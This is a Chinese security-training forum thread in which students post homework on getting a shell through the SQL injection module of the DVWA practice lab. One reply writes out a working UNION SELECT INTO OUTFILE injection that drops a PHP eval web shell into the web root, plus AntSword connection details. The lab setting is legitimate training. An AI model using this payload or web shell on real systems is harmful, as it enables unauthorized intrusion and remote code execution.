图文精华

易锦教育»学术中心 学术交流社区 作业中心 WEB渗透测试精英班(第一期) 20210828作业
分享

20210828作业

利用dvwa靶场的sqli板块getshell,写下getshell过程和最终蚁剑利用成功的截图
回复

使用道具 举报

已有(6)人评论

跳转到指定楼层
Deepred0 发表于 2021-8-29 18:45:15
作业作业作业

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x

点评

总结的很到位  详情 回复 发表于 2021-8-29 23:25
<
回复

使用道具 举报

恐龙先生 发表于 2021-8-29 23:25:46

总结的很到位
<
回复

使用道具 举报

金木 发表于 2021-8-30 15:09:43

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
<
回复

使用道具 举报

阿轩 发表于 2021-8-31 15:27:33
本帖最后由 阿轩 于 2021-8-31 15:31 编辑

DVWA获取shell

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
<
回复

使用道具 举报

mlq 发表于 2021-8-31 16:13:33
本帖最后由 mlq 于 2021-8-31 16:36 编辑

靶机命令行下
打开靶机 MySQL安装目录在my.ini 中添加[mysqld]下 secure_file_priv='' 重启服务
打开CMD命令行 登录root用户
授予用户 file 权限:GRANT FILE ON *.* TO 'dvwa'@'localhost';
授予所有权限:grant all privileges on *.* to 'dvwa'@'localhost' with grant option
刷新权限:flush privileges;

靶机打开 输入

1' and '1'!='1' union select '','<?php eval($_POST[cmd]);?>' INTO OUTFILE 'C:/phpstudy_pro/WWW/ww.php'#

蚁剑 添加数据  url http://192.168.56.101/ww.php  密码cmd  


本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
<
回复

使用道具 举报

陈亚钧 发表于 2021-9-1 21:37:36
提交作业

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
<
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则